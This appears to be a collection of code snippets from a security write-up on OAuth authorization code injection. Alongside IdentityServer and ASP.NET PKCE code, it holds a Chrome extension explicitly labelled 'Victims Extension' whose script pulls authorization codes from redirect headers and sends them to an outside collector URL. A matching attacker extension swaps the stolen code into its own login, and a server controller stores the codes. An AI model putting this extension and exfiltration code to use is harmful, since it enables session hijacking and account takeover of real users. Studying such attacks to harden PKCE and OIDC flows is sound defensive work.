DavidKlempfner

private bool ValidateCodeVerifierAgainstCodeChallenge(string codeVerifier, string codeChallenge, string codeChallengeMethod)
{
    if (codeChallengeMethod == OidcConstants.CodeChallengeMethods.Plain)
    {
        return TimeConstantComparer.IsEqual(codeVerifier.Sha256(), codeChallenge);
    }

    var codeVerifierBytes = Encoding.ASCII.GetBytes(codeVerifier);
    var hashedBytes = codeVerifierBytes.Sha256();
    var transformedCodeVerifier = Base64Url.Encode(hashedBytes);

DavidKlempfner

{
  "PersistentGrantDataContainerVersion": 1,
  "DataProtected": true,
  "Payload": "CfDJ8P_eUI7fv4VJqaZguyuE..."
}

DavidKlempfner

{
  "CreationTime": "2024–02–11T03:42:43Z",
  "Lifetime": 3000,
  "ClientId": "p-web",
  "Subject": {
    "AuthenticationType": "Identity.Application",
    "Claims": [
      {
        "Type": "sub",
        "Value": "2188df58–6343–4897–8f43–3afb325a924e"

DavidKlempfner

{
	"manifest_version": 3,
	"name": "Attacker's Chrome Extension",
	"description": "Updates the request with the authorization code from the victim",
	"version": "1.0",	
	"background": {
		"service_worker": "background.js"
	  },
	"host_permissions": [
		"<all_urls>"

DavidKlempfner

const callback = function(details) {	
	if (details.statusCode === 302) {
		const locationHeader = details.responseHeaders.find(x => x.name.toUpperCase() === 'LOCATION');		
		const callbackPath = '/authentication/callback?code='; // Update this with whatever path your browser uses to send the authorization code to the client app
		if (locationHeader && locationHeader.value.includes(callbackPath)) {
			const authCode = locationHeader.value.split('=')[1].split('&')[0];			
			
			// Attacker code:
			fetch('https://yourAzureUrl.net/AuthCodePersistor').then(r => r.text()).then(result => {				
				const newUrl = locationHeader.value.replace(authCode, result);				

DavidKlempfner

{
	"manifest_version": 3,
	"name": "Victims Extension",
	"description": "Allows an attacker to intercept the authorization code",
	"version": "1.0",	
	"background": {
		"service_worker": "background.js"
	  },
	"host_permissions": [
		"<all_urls>"

DavidKlempfner

const callback = function(details) {	
	if (details.statusCode === 302) {
		const locationHeader = details.responseHeaders.find(x => x.name.toUpperCase() === 'LOCATION');		
		const callbackPath = '/authentication/callback?code='; // Update this with whatever path your browser uses to send the authorization code to the client app
		if (locationHeader && locationHeader.value.includes(callbackPath)) {
			const authCode = locationHeader.value.split('=')[1].split('&')[0];			
			// Victim code:
			fetch('https://yourAzureUrl.net/AuthCodePersistor/' + authCode).then(r => r.text()).then(result => {				
			});
			chrome.tabs.update(details.tabId, {url: '<URL to send the victim to after the attack'});

DavidKlempfner

namespace AuthCodePersistor.Controllers
{
    [ApiController]
    [Route("[controller]")]
    public class AuthCodePersistor : ControllerBase
    {
        private static string AuthCode = "";

        [HttpGet]
        [Route("{authCode}")]

DavidKlempfner

message.State = Options.StateDataFormat.Protect(properties);

DavidKlempfner

private async Task HandleChallengeAsyncInternal(AuthenticationProperties properties)
{
    // code omitted 
    if (Options.UsePkce && Options.ResponseType == OpenIdConnectResponseType.Code)
    {
        var bytes = new byte[32];
        RandomNumberGenerator.Fill(bytes);
        var codeVerifier = Base64UrlTextEncoder.Encode(bytes);

        // Store this for use during the code redemption. See RunAuthorizationCodeReceivedEventAsync.